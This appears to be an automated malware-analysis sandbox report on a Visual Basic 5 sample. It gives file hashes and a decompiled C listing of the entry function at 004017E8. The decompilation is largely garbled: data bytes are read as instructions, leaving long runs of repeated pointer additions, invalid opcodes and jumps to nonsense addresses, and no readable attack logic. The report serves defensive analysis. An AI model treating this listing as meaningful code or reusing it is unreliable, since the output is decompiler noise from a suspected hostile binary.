Opcode ID: 8bf9dbbea923236b1172ec453ec9e912caefd4beabe9b1fa30a89e87f7bf89fc
Instruction ID: 5cb5ab5e9f62779bebd05734a3e6c79844af911842a3421b29f3f27970b1909c
Opcode Fuzzy Hash: 8bf9dbbea923236b1172ec453ec9e912caefd4beabe9b1fa30a89e87f7bf89fc
Instruction Fuzzy Hash: 7132E470901618DFEB20DB91CD45FDDB7B9BF04304F5085AAE109BB2A1DB785A88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004017E8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286
COMMON

Download Yara Rule

C-Code - Quality: 54%

			_entry_() {
				signed char _t103;
				intOrPtr* _t104;
				signed int _t106;
				intOrPtr _t109;
				intOrPtr* _t111;
				signed int _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				void* _t125;
				intOrPtr* _t126;
				signed int _t128;
				signed char _t129;
				signed char _t130;
				signed int _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t136;
				intOrPtr* _t137;
				signed char _t138;
				signed char _t139;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t145;
				intOrPtr* _t157;
				signed char _t158;
				signed char _t160;
				void* _t162;
				intOrPtr* _t166;
				signed char _t168;
				signed int* _t171;
				signed int _t173;
				void* _t174;
				void* _t177;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				intOrPtr* _t183;
				void* _t184;
				void* _t191;
				signed int _t192;
				intOrPtr* _t194;
				intOrPtr* _t195;
				intOrPtr* _t197;
				signed int _t202;
				void* _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t211;

				_push("VB5!6&*"); // executed
				L004017E2(); // executed
				 *_t103 =  *_t103 + _t103;
				 *_t103 =  *_t103 + _t103;
				 *_t103 =  *_t103 + _t103;
				 *_t103 =  *_t103 ^ _t103;
				 *_t103 =  *_t103 + _t103;
				_t104 = _t103 + 1;
				 *_t104 =  *_t104 + _t104;
				 *_t104 =  *_t104 + _t104;
				 *_t104 =  *_t104 + _t104;
				 *0x9497e2f7 =  *0x9497e2f7 + _t162;
				_push(es);
				asm("aam 0x48");
				asm("adc al, 0x2a");
				asm("clc");
				_t106 = 0x00000002 |  *2;
				 *_t106 = 2 +  *_t106;
				 *_t106 = 2 +  *_t106;
				 *_t171 = 2 +  *_t171;
				 *_t106 = 2 +  *_t106;
				 *_t180 =  *_t180 + _t171;
				_t192 = _t191 +  *_t171;
				 *_t106 = 2 +  *_t106;
				 *((intOrPtr*)(_t106 + 0x72)) =  *((intOrPtr*)(_t106 + 0x72)) + _t180;
				asm("outsd");
				_push(0x65);
				asm("arpl [ecx+esi], si");
				 *_t171 =  *_t171 | 0x00000002;
				asm("lock pop es");
				 *_t106 = 2 +  *_t106;
				 *_t106 = 2 +  *_t106;
				asm("int3");
				 *_t106 =  *_t106 ^ _t106;
				 *(_t180 + _t197 + 0x7079ba49) =  *(_t180 + _t197 + 0x7079ba49) & _t202;
				ds =  *0x00000190;
				_push(0x190);
				asm("fiadd word [esi]");
				_t109 =  *0x9298894;
				_t173 =  &(_t171[0]) - 1;
				_t181 = 0xf8;
				 *_t192 = _t109;
				asm("xlatb");
				_push(0xf8);
				_t194 = (_t192 |  *0xf8) - 1;
				asm("lodsd");
				_t111 = _t109 + 1;
				asm("stosb");
				 *((intOrPtr*)(_t111 - 0x2d)) =  *((intOrPtr*)(_t111 - 0x2d)) + _t111;
				_t112 = 0x190 ^  *(_t173 - 0x48ee309a);
				_t166 = _t111;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t112 =  *_t112 + 2;
				_push(es);
				 *_t112 =  *_t112 + _t112;
				 *_t173 =  *_t173 + 2;
				 *_t112 =  *_t112 + 2;
				 *_t166 =  *_t166 + _t173;
				_t11 = _t166 + 0x6f;
				 *_t11 =  *((intOrPtr*)(_t166 + 0x6f)) + 0xf8;
				asm("insb");
				asm("gs outsb");
				asm("outsd");
				if( *_t11 >= 0) {
					L7:
					asm("fild word [edx]");
					asm("adc [ebx], eax");
					_t166 = _t166 + _t166 +  *((intOrPtr*)(_t112 + _t112));
					 *_t112 =  *_t112 + _t112;
					_t113 = _t112 +  *_t197;
					_t29 = _t166 + 0x6c;
					 *_t29 =  *((intOrPtr*)(_t166 + 0x6c)) + _t113;
					asm("outsd");
					if( *_t29 >= 0) {
						L13:
						 *_t166 =  *_t166 + _t181;
						asm("adc eax, [eax]");
						_t166 = _t166 + _t166;
						_t114 = _t113 +  *((intOrPtr*)(_t113 + _t113));
						 *_t114 =  *_t114 + _t114;
						_t115 = _t114 + _t181;
						asm("arpl [eax], ax");
						es = es;
						 *_t115 =  *_t115 + _t115;
						_t195 = _t194 - 1;
						_t117 = _t115 + _t173 + 1;
						 *_t195 =  *_t195 + _t117;
						 *_t117 =  *_t117 + _t117;
						 *((intOrPtr*)(_t117 + 0x4f)) =  *((intOrPtr*)(_t117 + 0x4f)) + _t166;
						_t118 = _t117 + 1;
						 *_t195 =  *_t195 + _t118;
						 *_t118 =  *_t118 + _t118;
						 *_t118 =  *_t118 + _t166;
						_t194 = _t195 - 1;
						_t119 = _t118 + 1;
						 *_t194 =  *_t194 + _t119;
						 *_t119 =  *_t119 + _t119;
						_t197 = _t197 - 1;
						_t121 = _t119 + _t119 + 1;
						 *_t194 =  *_t194 + _t121;
						 *_t121 =  *_t121 + _t121;
						 *((intOrPtr*)(_t121 + 0x700404e)) =  *((intOrPtr*)(_t121 + 0x700404e)) + _t121;
						 *_t121 =  *_t121 + _t121;
						 *((intOrPtr*)(_t121 + 0x4e)) =  *((intOrPtr*)(_t121 + 0x4e)) + _t166;
						_t122 = _t121 + 1;
						 *_t194 =  *_t194 + _t122;
						 *_t122 =  *_t122 + _t122;
						_t203 = _t202 - 1;
						_t124 = _t122 + _t166 + 1;
						 *_t194 =  *_t194 + _t124;
						 *_t124 =  *_t124 + _t124;
						 *((intOrPtr*)(_t124 + 0x700404d)) =  *((intOrPtr*)(_t124 + 0x700404d)) + _t181;
						 *_t124 =  *_t124 + _t124;
						 *((intOrPtr*)(_t124 + 0x4d)) =  *((intOrPtr*)(_t124 + 0x4d)) + _t166;
						L15:
						_pop(_t125);
						_t204 = _t203 - 1;
						_t126 = _t125 + 1;
						 *_t194 =  *_t194 + _t126;
						 *_t126 =  *_t126 + _t126;
						_t206 = _t206 - 1;
						_t128 = _t126 + _t173 + 1;
						 *_t194 =  *_t194 + _t128;
						L16:
						 *_t128 =  *_t128 + _t128;
						 *((intOrPtr*)(_t206 + 0x42560040 + _t173 * 2)) =  *((intOrPtr*)(_t206 + 0x42560040 + _t173 * 2)) + _t173;
						_t129 = _t128 ^ 0x2a263621;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t197 =  *_t197 + _t166;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						 *_t129 =  *_t129 + _t129;
						_t130 = _t129 |  *_t129;
						 *_t130 =  *_t130 + _t130;
						 *_t130 =  *_t130 + _t130;
						 *_t130 =  *_t130 + _t130;
						 *_t130 =  *_t130 + _t130;
						 *_t130 =  *_t130 + _t130;
						 *_t130 =  *_t130 + _t130;
						 *_t181 = ds;
						_t132 = _t130 + 1 + _t181;
						asm("stc");
						 *_t132 =  *_t132 ^ _t132;
						_t168 = _t166 + _t166;
						asm("invalid");
						 *_t132 =  *_t132 | _t132;
						 *_t132 =  *_t132 + _t132;
						 *_t132 =  *_t132 + _t132;
						 *_t132 =  *_t132 + _t132;
						 *_t132 =  *_t132 | _t132;
						 *_t132 =  *_t132 + _t132;
						goto 0xc8401a45;
						asm("sbb al, 0x40");
						 *((intOrPtr*)(_t132 - 0xbffbfe7)) =  *((intOrPtr*)(_t132 - 0xbffbfe7)) + _t168;
						_pop(ss);
						_t133 = _t132 + 1;
						 *_t133 =  *_t133 + _t168;
						 *_t133 =  *_t133 + _t133;
						 *_t133 =  *_t133 + 0x8a0000;
						 *_t133 =  *_t133 + _t133;
						_t134 =  *_t133;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						_t205 =  *(_t206 + 0x75 + _t204 * 2) * 0x65766973;
						 *((intOrPtr*)(_t134 + 0x72)) =  *((intOrPtr*)(_t134 + 0x72)) + _t181;
						asm("outsd");
						_push(0x65);
						asm("arpl [ecx+esi], si");
						 *((intOrPtr*)(_t134 + 0x72)) =  *((intOrPtr*)(_t134 + 0x72)) + _t181;
						asm("outsd");
						_push(0x65);
						asm("arpl [ecx+esi], si");
						asm("hlt");
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						_t136 = _t134 - 1 + 1;
						 *_t136 =  *_t136 + _t136;
						 *_t136 =  *_t136 + _t136;
						 *((intOrPtr*)(_t136 + 0x42)) =  *((intOrPtr*)(_t136 + 0x42)) + _t136;
						_t174 = _t173 + 1;
						 *_t136 =  *_t136 + _t136;
						_t137 = _t136 + 0x46;
						 *_t137 =  *_t137 + _t137;
						 *(_t137 + 0x42) =  *(_t137 + 0x42) | _t181;
						 *_t197 =  *_t197 + _t181;
						asm("adc eax, 0x50000040");
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *((intOrPtr*)(_t137 + 0xc004019)) =  *((intOrPtr*)(_t137 + 0xc004019)) + _t168;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t181 + 1;
						 *_t137 =  *_t137 + _t137;
						asm("loop 0x80");
						_t183 = _t168;
						 *(_t183 + _t197 + 0x7079ba49) =  *(_t183 + _t197 + 0x7079ba49) & _t205;
						ds =  *_t168;
						_push(_t168);
						asm("fiadd word [esi]");
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						 *_t137 =  *_t137 + _t137;
						_t138 = _t137 +  *_t137;
						 *_t138 =  *_t138 + _t138;
						 *_t138 =  *_t138 + _t138;
						 *_t138 =  *_t138 + _t138;
						 *_t138 =  *_t138 + _t138;
						 *_t138 =  *_t138 + _t138;
						 *_t138 =  *_t138 + _t138;
						do {
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t168;
							asm("sbb [eax], al");
							_t206 = _t206 - 1;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t183;
							 *_t138 =  *_t138 + _t138;
							asm("popfd");
							_push(_t205);
							asm("adc dword [edx+0x4c834dd8], 0x4e70f36");
							asm("adc ebx, ecx");
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t168 =  *_t168 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							 *_t138 =  *_t138 + _t138;
							_t139 = _t168;
							_t168 = _t138;
							 *_t139 =  *_t139 + _t139;
							 *_t139 =  *_t139 + _t139;
							 *_t139 =  *_t139 + _t139;
							_t138 = (_t139 & 0x00000077) + 1;
							 *((intOrPtr*)(_t138 + _t138 + 0x500000)) =  *((intOrPtr*)(_t138 + _t138 + 0x500000)) + _t168;
							 *_t138 =  *_t138 + _t138;
							_t197 = _t197 + 1;
							_t183 = _t183 + _t168;
						} while (_t183 <= 0);
						asm("ror byte [edi-0x11c663b4], 1");
						_push(_t205);
						_t141 =  *0x24;
						 *_t141 =  *_t141 + _t141;
						 *_t141 =  *_t141 + _t141;
						 *_t141 =  *_t141 + _t141;
						 *_t141 =  *_t141 + _t141;
						 *_t141 =  *_t141 + _t141;
						 *_t141 =  *_t141 + _t141;
						 *_t183 =  *_t183 + _t141;
						 *_t141 =  *_t141 + _t141;
						 *_t141 =  *_t141 + _t141;
						_t142 = _t141 +  *_t141;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						_t184 = _t183 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						 *_t142 =  *_t142 + _t142;
						asm("outsd");
						_t145 = _t142 + _t184 + 1 + _t174;
						 *_t145 =  *_t145 + _t145;
						 *_t145 =  *_t145 + _t184;
						 *_t145 =  *_t145 + _t145;
						asm("repne jecxz 0x82");
						if ( *_t145 != 0) goto L21;
						_t177 = _t174 - 1;
					}
					 *[fs:eax] =  *[fs:eax] + _t173;
					_pop(es);
					asm("rol byte [ebx], 0x47");
					_t181 = _t181 +  *_t173;
					 *_t166 =  *_t166 + 1;
					_t157 = _t113 + 0x17d +  *((intOrPtr*)(_t113 + 0x17d)) -  *((intOrPtr*)(_t113 + 0x17d +  *((intOrPtr*)(_t113 + 0x17d))));
					 *_t157 =  *_t157 + _t157;
					_t158 = _t157 + 7;
					 *((intOrPtr*)(_t202 + 0x61)) =  *((intOrPtr*)(_t202 + 0x61)) + _t173;
					_t206 =  *(_t202 + _t194 + 0x61) * 0x507006c;
					asm("loopne 0x3");
					 *0x13b04bf =  *0x13b04bf - _t158;
					 *((intOrPtr*)(_t181 + 0x49)) =  *((intOrPtr*)(_t181 + 0x49)) + _t181;
					_push(_t197);
					_t203 = _t202 + 1;
					_push(_t181);
					_push(_t194);
					_t178 = _t173 + 1;
					_push(_t166);
					_t160 = (_t158 | 0x00000009) - 1;
					 *_t166 =  *_t166 + _t181;
					 *_t160 =  *_t160 + _t160;
					 *_t166 =  *_t166 + 1;
					 *[cs:eax] =  *[cs:eax] + _t160;
					 *0x6e490005 =  *0x6e490005 + _t160;
					L9:
					_t173 = _t178 - 1;
					asm("outsb");
					if(_t173 == 0) {
						goto L15;
					}
					asm("outsd");
					L11:
					 *_t194 =  *_t194 + _t160;
					_t128 = _t160 + 0x34801e0;
					_t211 = _t128;
					_t194 = 0xc013b04;
					asm("str word [edi+0x70]");
					if(_t211 >= 0) {
						goto L16;
					}
					asm("popad");
					asm("a16 jae 0x77");
					asm("popad");
					asm("bound esp, [ebp+0x6c]");
					asm("insb");
					if (_t211 < 0) goto L14;
					goto L13;
				}
				asm("gs insb");
				 *[gs:0x49000401] =  *[gs:0x49000401] + _t173;
				_push(_t194);
				_t179 = _t173 + 1;
				 *_t179 =  *_t179 + 0xc8;
				 *_t112 =  *_t112 + _t112;
				_t181 = 0xf9;
				 *((intOrPtr*)(0xf9)) =  *((intOrPtr*)(0xf9)) + _t112;
				 *((intOrPtr*)(_t206 + _t112)) =  *((intOrPtr*)(_t206 + _t112)) + _t206;
				 *((intOrPtr*)(_t179 + 0x57)) =  *((intOrPtr*)(_t179 + 0x57)) + _t179;
				_t173 = _t179 + 1;
				 *0x15d4 =  *0x15d4 + 0xf8;
				_push(_t194);
				asm("adc al, [eax]");
				 *0xf9000013 =  *0xf9000013 + _t112;
				asm("sbb eax, 0x440000");
				_t197 = _t197 + 1;
				_t194 = _t194 + _t194;
				 *((intOrPtr*)(0xf9)) =  *((intOrPtr*)(0xf9)) + _t166;
				 *_t112 =  *_t112 + 2;
				 *_t173 =  *_t173 + 2;
				_push(es);
				_t17 = _t173 + 0x6d + _t202 * 2;
				 *_t17 =  *((intOrPtr*)(_t173 + 0x6d + _t202 * 2)) + 0xf9;
				if( *_t17 < 0) {
					L6:
					_t181 = _t181 +  *_t194;
					_pop(es);
					goto L7;
				}
				 *_t166 =  *_t166 + _t173;
				_pop(es);
				 *_t112 =  *_t112 + 2;
				 *(_t112 - 0xfffffa) =  *(_t112 - 0xfffffa) | 0x000000c8;
				_t203 = _t202 +  *((intOrPtr*)(_t112 + _t112));
				 *_t112 =  *_t112 + 2;
				_t178 = _t173 +  *_t112;
				 *((intOrPtr*)(_t166 + 0x6f)) =  *((intOrPtr*)(_t166 + 0x6f)) + 2;
				asm("insd");
				asm("insd");
				asm("popad");
				asm("outsb");
				 *[fs:eax] =  *[fs:eax] ^ _t112;
				_t160 = _t112 + 0x00000001 |  *(_t112 + 1);
				_push(_t160);
				if(2 < 0) {
					goto L9;
				}
				asm("arpl [edi+0x6e], bp");
				if(2 >= 0) {
					goto L11;
				}
				asm("outsb");
				if (2 == 0) goto L5;
				_t112 = _t160 + 0x10;
				_push(cs);
				asm("rol byte [ebx], 0x17");
				goto L6;
			}

0x004017e8
0x004017ed
0x004017f2
0x004017f4
0x004017f6
0x004017f8
0x004017fa
0x004017fc
0x004017fd
0x004017ff
0x00401801
0x00401803
0x00401809
0x0040180a
0x00401810
0x00401812
0x00401813
0x00401815
0x00401817
0x00401819
0x0040181b
0x0040181d
0x0040181f
0x00401821
0x00401823
0x00401826
0x00401827
0x00401829
0x0040182d
0x00401830
0x00401833
0x00401835
0x00401839
0x0040183a
0x00401841
0x00401848
